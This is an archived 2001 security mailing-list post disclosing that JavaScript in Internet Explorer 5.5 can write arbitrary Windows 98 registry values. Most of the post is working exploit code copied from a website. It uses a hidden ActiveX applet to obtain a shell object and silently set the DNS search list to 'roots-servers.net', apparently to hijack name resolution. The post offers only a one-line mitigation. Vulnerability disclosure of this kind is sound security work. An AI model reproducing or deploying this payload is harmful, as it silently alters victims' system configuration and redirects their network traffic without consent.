javascript can write anything to windows98 registry

From: Marcin Jackowski (marcinat_private)
Date: Tue Aug 28 2001 - 01:21:10 PDT

  • Next message: Larry W. Cashdollar: "Netscape 6.01A ksh "here document" vulnerability." 

    here's code from
www.4y4y.net:88/ls.html
it can write any value to windows98 registry

solution: disable JavaScript in InternetExplorer

tested on IE5.5


Marcin Jackowski

---------------------------------------------------------------

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi3(){
    try{
        a1=document.applets[0];
        a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a1.createInstance();Shl = a1.GetObject();
        a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
        try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\SearchList","roots-se
rvers.net");
        }
        catch(e){}
    }
    catch(e){}
}
setTimeout("yuzi3()",1000);
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function yuzi2(){
    try{
        a2=document.applets[0];a2.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
        a2.createInstance();Shl =
a2.GetObject();a2.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
            try{

Shl.RegWrite("HKLM\\System\\CurrentControlSet\\Services\\VxD\\MSTCP\\EnableDns","1");
            }
        catch(e){}
    }
    catch(e){}
}setTimeout("yuzi2()",1000);
</script>

    This archive was generated by hypermail 2b30 : Tue Aug 28 2001 - 20:15:09 PDT